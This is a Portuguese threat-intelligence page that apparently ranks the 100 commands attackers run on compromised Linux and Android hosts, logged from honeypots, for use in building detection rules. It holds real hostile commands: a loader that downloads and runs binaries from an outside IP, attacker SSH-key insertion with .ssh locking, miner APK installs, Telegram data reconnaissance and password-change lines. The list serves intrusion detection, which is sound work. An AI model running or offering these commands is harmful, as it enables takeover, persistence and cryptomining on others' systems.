TROYANOSYVIRUS
Atualizado: abril de 2026

Top 100 Comandos Maliciosos

Os comandos mais executados por atacantes apos obter acesso ao sistema. Util para deteccao de intrusoes e resposta a incidentes.

5,261 comandos em 24h
1.
$uname -a
159 IPs265x
2.
$Enter new UNIX password:
91 IPs256x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
161 IPs244x
4.
$lockr -ia .ssh
161 IPs244x
5.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
158 IPs241x
6.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
155 IPs235x
7.
$whoami
155 IPs235x
8.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
155 IPs235x
9.
$lscpu | grep Model
155 IPs235x
10.
$cat /proc/cpuinfo | grep model | grep name | wc -l
153 IPs234x
11.
$cat /proc/cpuinfo | grep name | wc -l
154 IPs234x
12.
$which ls
154 IPs234x
13.
$uname -m
153 IPs234x
14.
$crontab -l
154 IPs234x
15.
$ls -lh $(which ls)
154 IPs234x
16.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
154 IPs234x
17.
$top
153 IPs234x
18.
$w
152 IPs233x
19.
$uname
153 IPs233x
20.
$/bin/./uname -s -v -n -r -m
20 IPs144x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
94 IPs107x
22.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs9x
23.
$uname -s -v -n -r -m
4 IPs7x
24.
$/ip cloud print
3 IPs6x
25.
$ps | grep trinity
3 IPs6x
26.
$pm install /data/local/tmp/ufo.apk
3 IPs6x
27.
$am start -n com.ufo.miner/com.example.test.MainActivity
3 IPs6x
28.
$rm -rf /data/local/tmp/*
3 IPs6x
29.
$pm path com.ufo.miner
3 IPs6x
30.
$rm -f /data/local/tmp/ufo.apk
3 IPs6x
31.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
3 IPs5x
32.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs5x
33.
$/data/local/tmp/nohup /data/local/tmp/trinity
3 IPs5x
34.
$chmod 0755 /data/local/tmp/trinity
3 IPs5x
35.
$chmod 0755 /data/local/tmp/nohup
3 IPs5x
36.
$echo Hi | cat -n
3 IPs3x
37.
$cat /proc/cpuinfo
3 IPs3x
38.
$uname -s -v -n -m 2 > /dev/null
1 IPs3x
39.
$ps -ef | grep '[Mm]iner'
3 IPs3x
40.
$ps | grep '[Mm]iner'
3 IPs3x
41.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
42.
$ifconfig
3 IPs3x
43.
$echo hello
1 IPs3x
44.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $
1 IPs3x
45.
$locate D877F783D5D3EF8Cs
2 IPs2x
46.
$echo 'SSH check'
1 IPs2x
47.
$uname -s -m
2 IPs2x
48.
$echo "0\nhFohi2WWrkUk\nhFohi2WWrkUk\n"|passwd
1 IPs1x
49.
$echo "Asdf@123\nbQp3FHC3KhSC\nbQp3FHC3KhSC\n"|passwd
1 IPs1x
50.
$echo "0\nYy1vancBjhYK\nYy1vancBjhYK\n"|passwd
1 IPs1x
51.
$echo "Asdf@123\nW1iZNNqJgjfL\nW1iZNNqJgjfL\n"|passwd
1 IPs1x
52.
$echo "Ali01!\nT55qeqntqbJY\nT55qeqntqbJY\n"|passwd
1 IPs1x
53.
$echo "0\nK21eWWM1Th6T\nK21eWWM1Th6T\n"|passwd
1 IPs1x
54.
$echo "0\nJBVm93zvIJeT\nJBVm93zvIJeT\n"|passwd
1 IPs1x
55.
$echo "Aa123456\niKRVgALlFMLT\niKRVgALlFMLT\n"|passwd
1 IPs1x
56.
$echo "Asdf@123\nJJJNANQMVHgQ\nJJJNANQMVHgQ\n"|passwd
1 IPs1x
57.
$echo "Aa123456\nRFpLRQmnTwvM\nRFpLRQmnTwvM\n"|passwd
1 IPs1x
58.
$echo "Asdf@123\nZiyKGCufAMsC\nZiyKGCufAMsC\n"|passwd
1 IPs1x
59.
$echo "0\nBun0W1mtjcOb\nBun0W1mtjcOb\n"|passwd
1 IPs1x
60.
$echo "Asdf@123\nbqs5Doat30yi\nbqs5Doat30yi\n"|passwd
1 IPs1x
61.
$echo "Bot01\nmzJh8NsQSMVT\nmzJh8NsQSMVT\n"|passwd
1 IPs1x
62.
$echo "Bot25!\nanD0P5aD3kF2\nanD0P5aD3kF2\n"|passwd
1 IPs1x
63.
$echo "Aa123321\nL9Xx6QEIAjXA\nL9Xx6QEIAjXA\n"|passwd
1 IPs1x
64.
$echo "AAAA123456\nqLucVkkvzI0Z\nqLucVkkvzI0Z\n"|passwd
1 IPs1x
65.
$echo "0\n9RAL3pk3hfTL\n9RAL3pk3hfTL\n"|passwd
1 IPs1x
66.
$echo "2026\nXAjlTzZtLVTK\nXAjlTzZtLVTK\n"|passwd
1 IPs1x
67.
$echo "n8n28\ncLzz099SiaI9\ncLzz099SiaI9\n"|passwd
1 IPs1x
68.
$echo "1qaz@WSX\nuTHp4TtyfIhf\nuTHp4TtyfIhf\n"|passwd
1 IPs1x
69.
$echo "lab\nXhMFFYq4kc8P\nXhMFFYq4kc8P\n"|passwd
1 IPs1x
70.
$echo "kris\n7CoB1kodZgH4\n7CoB1kodZgH4\n"|passwd
1 IPs1x
71.
$echo "1qaz@WSX\nsTseuTiUiSS1\nsTseuTiUiSS1\n"|passwd
1 IPs1x
72.
$echo "1q2w3e4r\ns70dxzYtXBK5\ns70dxzYtXBK5\n"|passwd
1 IPs1x
73.
$echo "0\n4d6worH6mNGc\n4d6worH6mNGc\n"|passwd
1 IPs1x
74.
$echo "0\n3TN4ZkLRndQ6\n3TN4ZkLRndQ6\n"|passwd
1 IPs1x
75.
$echo "1q2w3e4r\no79A2gY9ONxB\no79A2gY9ONxB\n"|passwd
1 IPs1x
76.
$echo "1q2w3e4r\njuiYOZDgCqNV\njuiYOZDgCqNV\n"|passwd
1 IPs1x
77.
$echo "0\n1lkOKVQ24z7v\n1lkOKVQ24z7v\n"|passwd
1 IPs1x
78.
$echo "1q2w3e4r\nS9ay6QAXm32i\nS9ay6QAXm32i\n"|passwd
1 IPs1x
79.
$echo "frappe20!\nTefnIwZ8t5Mq\nTefnIwZ8t5Mq\n"|passwd
1 IPs1x
80.
$echo "123qweasd\nHj2w8kBEg8NA\nHj2w8kBEg8NA\n"|passwd
1 IPs1x
81.
$echo "!@#qweasd\nnIDy3V6DhFG1\nnIDy3V6DhFG1\n"|passwd
1 IPs1x
82.
$echo "frappe123\nsOywA4Yu0zN7\nsOywA4Yu0zN7\n"|passwd
1 IPs1x
83.
$echo "dev27\nya2Zq7UAM3bl\nya2Zq7UAM3bl\n"|passwd
1 IPs1x
84.
$echo "123456\nx4VnOHRe1uxJ\nx4VnOHRe1uxJ\n"|passwd
1 IPs1x
85.
$echo "dev27\nZN7ZNtimNlva\nZN7ZNtimNlva\n"|passwd
1 IPs1x
86.
$echo "dev27\nQrbyBZdFloex\nQrbyBZdFloex\n"|passwd
1 IPs1x
87.
$echo "123456\nuxt7GCV2zZQ5\nuxt7GCV2zZQ5\n"|passwd
1 IPs1x
88.
$echo "frappe20!\nUwbneUKUHoAP\nUwbneUKUHoAP\n"|passwd
1 IPs1x
89.
$echo "frappe20!\nZhBCO5sgt44W\nZhBCO5sgt44W\n"|passwd
1 IPs1x
90.
$echo "ftpuser8\nBvwmrePJDWXe\nBvwmrePJDWXe\n"|passwd
1 IPs1x
91.
$echo "ftpuser8\nN1JsLt7bDE8y\nN1JsLt7bDE8y\n"|passwd
1 IPs1x
92.
$echo "home\nB4Yez4BIKu0y\nB4Yez4BIKu0y\n"|passwd
1 IPs1x
93.
$echo "home\nW5cKkHlEc0eN\nW5cKkHlEc0eN\n"|passwd
1 IPs1x
94.
$echo "home\ntwgYkpYhSjAl\ntwgYkpYhSjAl\n"|passwd
1 IPs1x
95.
$echo "admin2\nrLaxLIKhjWsi\nrLaxLIKhjWsi\n"|passwd
1 IPs1x
96.
$echo "kris\ndUbxAdscGvLH\ndUbxAdscGvLH\n"|passwd
1 IPs1x
97.
$echo "admin2\nZIl2aKTVq4Nw\nZIl2aKTVq4Nw\n"|passwd
1 IPs1x
98.
$echo "lab\nb8cDRWRDGcXE\nb8cDRWRDGcXE\n"|passwd
1 IPs1x
99.
$echo "admin2\nFJKGrQpUs0VS\nFJKGrQpUs0VS\n"|passwd
1 IPs1x
100.
$echo "Vpn15\niu9l27oFsR5K\niu9l27oFsR5K\n"|passwd
1 IPs1x

Reconhecimento

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Deteccao

Estes comandos podem ser usados para criar regras de deteccao em SIEM, IDS/IPS e sistemas de monitoramento. Monitore estes padroes em seus logs para detectar intrusoes.